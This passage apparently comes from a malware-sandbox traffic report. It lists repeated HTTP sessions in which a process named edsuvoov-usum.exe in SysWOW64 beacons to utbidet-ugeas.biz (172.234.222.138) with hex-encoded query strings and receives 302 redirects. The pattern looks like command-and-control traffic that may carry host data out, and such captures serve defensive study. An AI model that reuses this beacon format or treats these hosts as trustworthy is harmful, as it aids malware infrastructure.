                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            103192.168.2.361465172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:49.391170979 CEST201OUTGET /d/N?028EBB235C89BB235CBCBB0B5C8EBBAD8F1A838B068FBBE3F48CB81572BC951A6EBE8B0D5C HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:49.878395081 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?028EBB235C89BB235CBCBB0B5C8EBBAD8F1A838B068FBBE3F48CB81572BC951A6EBE8B0D5C
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            104192.168.2.361467172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:50.773087978 CEST169OUTGET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:51.259891987 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:51 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            105192.168.2.361468172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:51.268795967 CEST201OUTGET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:51.754921913 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:51 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            106192.168.2.361470172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:51.913532972 CEST169OUTGET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:52.393479109 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:52 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            107192.168.2.361471172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:52.432877064 CEST201OUTGET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:52.920299053 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:52 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            108192.168.2.361473172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:53.522895098 CEST169OUTGET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:54.019897938 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:53 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            109192.168.2.361474172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:54.025782108 CEST201OUTGET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:54.517698050 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:54 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            110192.168.2.361476172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:54.710196972 CEST169OUTGET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:55.222570896 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:55 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            111192.168.2.361477172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:55.228358030 CEST201OUTGET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:55.708266020 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:55 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            112192.168.2.361479172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:55.887200117 CEST169OUTGET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:56.374618053 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:56 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            113192.168.2.361480172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:56.396970987 CEST201OUTGET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:56.875593901 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:56 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            114192.168.2.361482172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:59.335441113 CEST169OUTGET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:59.830460072 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:59 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            115192.168.2.361483172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:59.859873056 CEST201OUTGET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:00.341392994 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


